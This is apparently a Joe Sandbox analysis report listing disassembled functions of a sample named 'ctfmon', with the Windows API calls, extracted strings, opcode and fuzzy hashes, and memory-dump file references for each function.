Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
Instruction ID: 1c1bb1606c7b6fcb0188c767b7bd5df6e6ab6d9813dcdc4c782d48c425fdd25b
Opcode Fuzzy Hash: 7be549c15be2d0881abb1e3d0c118bfa54edfa45425f65dce38ef14f92b6c35a
Instruction Fuzzy Hash: 6F018435340135BBDB219F55AC48EEF7B6CFF06710F818032F911A1164DB34D9568B98

Function 004099B9 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 280memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004099BE
CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 00409ADA
CoTaskMemFree.OLE32(?,?,00000000), ref: 00409CC1

Strings

(, xrefs: 00409CB5
, xrefs: 00409B96

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Task$AllocFreeH_prolog
String ID: $(
API String ID: 1522537378-55695022
Opcode ID: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
Instruction ID: e45d171d2f1bb2aaac46846c8d0f16db648deb0d3cfea91ab4a4292c5bbd6be5
Opcode Fuzzy Hash: 7e69d556818cd5a1851330303f45f1f73408314ae1e8427cd738d52b82eff929
Instruction Fuzzy Hash: 7AB10970A002059FDB14DFA9C884AAEFBF5FF88304B20496EE016EB291D775AD45CF54

Function 004048D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137networkCOMMON

Download Yara Rule

APIs

select.WS2_32(00000001,?,00000000,00000000,00000014), ref: 0040491E
recv.WS2_32(00000000,023A0000,000186A0,00000000), ref: 00404953
closesocket.WS2_32(00000000), ref: 00404A22
closesocket.WS2_32(00000000), ref: 00404A46

Strings

+*&=^^^^--------PTPM1, xrefs: 0040498A, 00404A57

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: closesocket$recvselect
String ID: +*&=^^^^--------PTPM1
API String ID: 3519190455-393624235
Opcode ID: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
Instruction ID: a15c9d51dc272b9fe545b8961346552fe0b4d2b02f1de687d51cf6678d7e3f35
Opcode Fuzzy Hash: 27ed70f289c475a146f3c2e7ccf0ebaab3ee20ce23d8714a6e4ca9bd04cb5120
Instruction Fuzzy Hash: 6951B2762002009FC704CF24FC40B67BBF5F7A8314F548539E994A73A1D7B9A989EBA5

Function 004102A3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 004102C2
GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004102F7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00410357

Strings

__MSVCRT_HEAP_SELECT, xrefs: 004102F2
__GLOBAL_HEAP_SELECTED, xrefs: 00410331

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: EnvironmentFileModuleNameVariableVersion
String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
API String ID: 1385375860-4131005785
Opcode ID: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
Instruction ID: 126d5043a1f7e65bc2068d23c44456634c671ba06e8d0b95b91ab4156e3e84ef
Opcode Fuzzy Hash: bfe30102a0c4b2ab94a83b46ebd1f32b03c0ef1caef6cc2600ff381d8645089f
Instruction Fuzzy Hash: 44314A7194534CAFEB3187705C95BDF37689B06308F5404DBD894D6242D6F88EC68B1D

Function 004222F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000433,00000000,?), ref: 004223A9
GetWindowLongW.USER32(?,000000FC), ref: 004223BA
GetWindowLongW.USER32(?,000000FC), ref: 004223CA
SetWindowLongW.USER32(?,000000FC,?), ref: 004223E6

Strings

(, xrefs: 00422394

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: (
API String ID: 2178440468-3887548279
Opcode ID: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
Instruction ID: 0887fd1d8c57f0dc07a948d484ba5af13b1aab812eb589b308dbb2651f147842
Opcode Fuzzy Hash: 3bf4c99cb503225f52b8dd62f2c612ffa84565c72bf3dd4d27c3f5495f9711c6
Instruction Fuzzy Hash: 8E31AE31700620AFDB21EF75E984B6FBBA4BF04314F90452EE94197691DBB9A805CB98

Function 00409201 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 00409271
SysFreeString.OLEAUT32(?), ref: 004092E0
SysFreeString.OLEAUT32(?), ref: 004092EA
SysFreeString.OLEAUT32(?), ref: 004092F4

Strings

`DvP?Dv, xrefs: 004092D2

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FreeString$ClearVariant
String ID: `DvP?Dv
API String ID: 3349467263-2995021381
Opcode ID: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
Instruction ID: 3575c1e55b8ebace504c8559d5d8e129edef3a0f818806659e3e1524f78f469a
Opcode Fuzzy Hash: c6ed0a969ed6b6261a651c332f025beb1c08d77c40190fe13384ae6ea06520fe
Instruction Fuzzy Hash: 6E313971A00229FFCB14DFA5C884ADEBBB8FF48710F50842AF509A6281D774A944CFA4

Function 00429229 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 0042925A

Part of subcall function 00429348: lstrlenW.KERNEL32(?,0042928B,?,?), ref: 0042937C

lstrcpyW.KERNEL32(?,.HLP,?,?,00000104), ref: 004292FB
lstrcatW.KERNEL32(?,.INI,?,?,00000104), ref: 0042932A

Strings

.HLP, xrefs: 004292F3
.INI, xrefs: 00429324

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FileModuleNamelstrcatlstrcpylstrlen
String ID: .HLP$.INI
API String ID: 2421895198-3011182340
Opcode ID: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
Instruction ID: 5354100141cd0111f2c83c4e759e606604062e502d5c36874ba2bea8a0f2629b
Opcode Fuzzy Hash: 32c3fdbe47f13a2511c981e50f3e73462810435089390b33b1753ebd04fc943f
Instruction Fuzzy Hash: E53142B1900719EFDB20DFA5D885AC6B7F8AF08304F5049BBE54AD3151DB34AD848B68

Function 0042703B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

Part of subcall function 004271B3: GetParent.USER32(?), ref: 004271E6
Part of subcall function 004271B3: GetLastActivePopup.USER32(?), ref: 004271F5
Part of subcall function 004271B3: IsWindowEnabled.USER32(?), ref: 0042720A
Part of subcall function 004271B3: EnableWindow.USER32(?,00000000), ref: 0042721D

SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00427071
GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 004270DF
MessageBoxW.USER32(00000000,?,?,00000000), ref: 004270ED
EnableWindow.USER32(00000000,00000001), ref: 00427109

Strings

PMB, xrefs: 0042703B

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
String ID: PMB
API String ID: 1958756768-1324934742
Opcode ID: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
Instruction ID: 4949e603ba3b1f5991230ca5172b941e34d29e6685895596331aeb27549c8e70
Opcode Fuzzy Hash: ce7fb727ab09d04d5f3f623b72e458f79ee0fa9dbac5fe75b105723b8ce71699
Instruction Fuzzy Hash: 8521D672B04128AFDB209F94DCC5BAFB7B9EB44350F94042AE514E3350C7799D498BA4

Function 00420EB3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 00420EF4
GetDlgItem.USER32(?,00000002), ref: 00420F13
IsWindowEnabled.USER32(00000000), ref: 00420F1E
SendMessageW.USER32(?,00000111,00000002,00000000), ref: 00420F34

Strings

Edit, xrefs: 00420EFE

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Window$EnabledItemLongMessageSend
String ID: Edit
API String ID: 3499652902-554135844
Opcode ID: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
Instruction ID: 60899dcfc3587a15ced3cc413fca3ebc9283b805f23eb41fcd32d928ea0cbd6c
Opcode Fuzzy Hash: c0a5469a5a856ea4fc2de64ab117f76beaec6be51fad4795c6557c1e6c80bc8f
Instruction Fuzzy Hash: 40010830380231AAEA306B26BD09B7BB7E59F10760FD24427F401E22E2CBE8D856C11C

Function 0042657D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,00407774,00000000,?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042658E
GetViewportExtEx.GDI32(?,?,?,00407774,?,?,?,?,?,?,00000000,00000000), ref: 0042659B
MulDiv.KERNEL32(00407774,00000000,00000000), ref: 004265C0
MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 004265DB

Strings

tw@, xrefs: 0042657D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ViewportWindow
String ID: tw@
API String ID: 1589084482-3122378559
Opcode ID: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
Instruction ID: ce0e09d475a622cb5eb5a1da7693da6cd9b819a777b60fa32cf6f8d38c90c4e5
Opcode Fuzzy Hash: 5bbac0ae4d7fb4264335a9c4321448357a773c21af9a9bff716acac9ab490366
Instruction Fuzzy Hash: 7AF01D72400108FFEB156BA2EC05CBEBBBDEF90314754487AF851A3170DB726D619B94

Function 0040FFEC Relevance: 7.6, APIs: 5, Instructions: 150COMMON

Download Yara Rule

APIs

GetStartupInfoA.KERNEL32(?), ref: 0041004A
GetFileType.KERNEL32(?,?,00000000), ref: 004100F5
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 00410158
GetFileType.KERNEL32(00000000,?,00000000), ref: 00410166
SetHandleCount.KERNEL32 ref: 0041019D

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
Instruction ID: 9efafb25e1c49cefaa9801ddeb0c15ad3ba9d2cf75d41a5d73fe4d8c6704c713
Opcode Fuzzy Hash: c4614b89e3f0e78a588a77f40bdc57e04f10cb5bb0fe7c99d5bd66e85f2c9a8e
Instruction Fuzzy Hash: 855138315042059BC7208B68DC847EA7BE0FB16338F24466EC592DB2E1D7BED8DAC759

Function 00406B35 Relevance: 7.6, APIs: 5, Instructions: 127windowthreadCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00406B3A
SendMessageW.USER32(?,00000138,?,?), ref: 00406BD4
GetBkColor.GDI32(?), ref: 00406BDD
GetTextColor.GDI32(?), ref: 00406BE9
GetThreadLocale.KERNEL32 ref: 00406C78

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Color$H_prologLocaleMessageSendTextThread
String ID:
API String ID: 741590120-0
Opcode ID: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
Instruction ID: f9e5b8384eab3ba489f7196092203c7d724fd180af1cedfd33864e84ada0d436
Opcode Fuzzy Hash: f7053f1ad1be2417574c4c939892cdd83a9888b3ce4a9b4dd911e18ce2a993c2
Instruction Fuzzy Hash: 1051AF70914716DFDB20DF65C9404AAB7F0FF14314B22852EE897AB3A0E738E961CB59

Function 0042A6D8 Relevance: 7.6, APIs: 5, Instructions: 81memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 0042A739

Part of subcall function 00424B39: LoadStringW.USER32(?,?,?,?), ref: 00424B50

SysAllocString.OLEAUT32(?), ref: 0042A748
SysAllocString.OLEAUT32(?), ref: 0042A78E
SysAllocString.OLEAUT32(?), ref: 0042A7A2
SysAllocString.OLEAUT32(?), ref: 0042A7BF

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: String$Alloc$Load
String ID:
API String ID: 3862620831-0
Opcode ID: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
Instruction ID: 6803650498ba4989a99e64115ce7b714a56dc8d8622e699d9d0cda383d46dfbc
Opcode Fuzzy Hash: f6ca087355628dbc399f6843932c52c76a3f68a4c4011377d4e366b53c13f2f5
Instruction Fuzzy Hash: F8317C30600710AFC720EF26E885B5AB7F5BF84700F50892BE85997691D778E891CB9A

Function 0041C930 Relevance: 7.6, APIs: 5, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
Instruction ID: 5f9584f858f3fd3441d1eeae4cb6474de1c9940f427edf65aea8a548a520b4bc
Opcode Fuzzy Hash: 0267abc6433f213ff09637eccae298c1139d1c86d54d5fa1176bbc9bac3441c6
Instruction Fuzzy Hash: 8D31B475650210AFD330DF19EC856E637A0FBA1358F20653AD60AC72E1D734988ECB94

Function 004278C7 Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

GetMapMode.GDI32(?,?,?,?,?,?,00407740,?,00000000,?,?,?,?,?,?,?), ref: 004278D7
GetDeviceCaps.GDI32(?,00000058), ref: 00427911
GetDeviceCaps.GDI32(?,0000005A), ref: 0042791A

Part of subcall function 004265E6: GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 004265F7
Part of subcall function 004265E6: GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 00426604
Part of subcall function 004265E6: MulDiv.KERNEL32(?,00000000,00000000), ref: 00426629
Part of subcall function 004265E6: MulDiv.KERNEL32(00000002,00000000,00000000), ref: 00426644

MulDiv.KERNEL32(?,000009EC,00000060), ref: 0042793E
MulDiv.KERNEL32(00000002,000009EC,?), ref: 00427949

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: CapsDevice$ModeViewportWindow
String ID:
API String ID: 2598972148-0
Opcode ID: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
Instruction ID: 6e5dd03be2f2a077cc23b63b074e70d19be67c8710d15462bb73e943247fa81e
Opcode Fuzzy Hash: 82fb9aefea54476f9e4efb772e43ca4f4989d83242b50b67186938c72895dec2
Instruction Fuzzy Hash: C211CE71700624EFEB21AF55EC44C2FBBE9EF88750B51402AE98597321D771AC829F54

Function 0042271F Relevance: 7.6, APIs: 5, Instructions: 52stringregistryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00422724
GetClassInfoW.USER32(?,?,?), ref: 0042273F
RegisterClassW.USER32(00000004), ref: 0042274A
lstrcatW.KERNEL32(00000034,?,00000001), ref: 00422781
lstrcatW.KERNEL32(00000034,00000004), ref: 00422792

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: Classlstrcat$H_prologInfoRegister
String ID:
API String ID: 106226465-0
Opcode ID: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
Instruction ID: 6b4f5334b2da6ce01ac7bdb77f7903c950944f1e7d17838be749cb4d6a50b4f5
Opcode Fuzzy Hash: 5646f68694f66a7569b41e42e3248d6500a3e60ab4d64e53f9044bdf58ec9da1
Instruction Fuzzy Hash: 4111E535701324BEDB10AFA1ED81A9E7BB8EF44754F40452EFC05A7151CBB496018B99

Function 0041020F Relevance: 7.5, APIs: 5, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,0040F933,004152C9,00000000,?,?,00000000,00000001), ref: 00410211
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 0041021F
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0041026B

Part of subcall function 00413F58: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,00410234,00000001,00000074,?,?,00000000,00000001), ref: 0041404E

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 00410243
GetCurrentThreadId.KERNEL32 ref: 00410254

Memory Dump Source

Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 4d9088bc305a3a135a6a46da3cc8cf04b83fd6bff02b56f14dc8209a2a451f00
